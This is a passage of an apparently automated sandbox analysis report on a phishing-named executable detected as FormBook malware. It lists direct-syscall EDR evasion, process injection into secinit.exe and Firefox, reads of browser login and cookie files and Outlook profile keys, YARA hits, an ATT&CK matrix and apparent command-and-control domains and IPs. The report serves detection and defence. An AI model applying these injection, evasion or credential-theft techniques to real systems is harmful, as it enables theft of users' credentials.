                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166CA6F mov eax, dword ptr fs:[00000030h]3_2_0166CA6F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DEA60 mov eax, dword ptr fs:[00000030h]3_2_016DEA60
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016ACA72 mov eax, dword ptr fs:[00000030h]3_2_016ACA72
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016ACA72 mov eax, dword ptr fs:[00000030h]3_2_016ACA72
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636A50 mov eax, dword ptr fs:[00000030h]3_2_01636A50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640A5B mov eax, dword ptr fs:[00000030h]3_2_01640A5B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640A5B mov eax, dword ptr fs:[00000030h]3_2_01640A5B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166CA24 mov eax, dword ptr fs:[00000030h]3_2_0166CA24
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165EA2E mov eax, dword ptr fs:[00000030h]3_2_0165EA2E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01654A35 mov eax, dword ptr fs:[00000030h]3_2_01654A35
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01654A35 mov eax, dword ptr fs:[00000030h]3_2_01654A35
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166CA38 mov eax, dword ptr fs:[00000030h]3_2_0166CA38
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BCA11 mov eax, dword ptr fs:[00000030h]3_2_016BCA11
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166AAEE mov eax, dword ptr fs:[00000030h]3_2_0166AAEE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166AAEE mov eax, dword ptr fs:[00000030h]3_2_0166AAEE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01686ACC mov eax, dword ptr fs:[00000030h]3_2_01686ACC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01686ACC mov eax, dword ptr fs:[00000030h]3_2_01686ACC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01686ACC mov eax, dword ptr fs:[00000030h]3_2_01686ACC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630AD0 mov eax, dword ptr fs:[00000030h]3_2_01630AD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01664AD0 mov eax, dword ptr fs:[00000030h]3_2_01664AD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01664AD0 mov eax, dword ptr fs:[00000030h]3_2_01664AD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638AA0 mov eax, dword ptr fs:[00000030h]3_2_01638AA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638AA0 mov eax, dword ptr fs:[00000030h]3_2_01638AA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01686AA4 mov eax, dword ptr fs:[00000030h]3_2_01686AA4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory written: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread register set: target process: 7352Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread APC queued: target process: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1595905 Sample: INVOICE, PACKING LIST, COPY... Startdate: 21/01/2025 Architecture: WINDOWS Score: 100 31 www.physicsbrain.xyz 2->31 33 www.autonomousrich.xyz 2->33 35 6 other IPs or domains 2->35 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 INVOICE, PACKING LIST, COPY BL.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\...\INVOICE, PACKING LIST, COPY BL.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 INVOICE, PACKING LIST, COPY BL.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 2zqVCuEmR.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 secinit.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 2zqVCuEmR.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.physicsbrain.xyz 13.248.169.48, 49712, 49726, 49727 AMAZON-02US United States 23->37 39 www.corellia.pro 217.160.0.90, 49730, 49731, 49732 ONEANDONE-ASBrauerstrasse48DE Germany 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.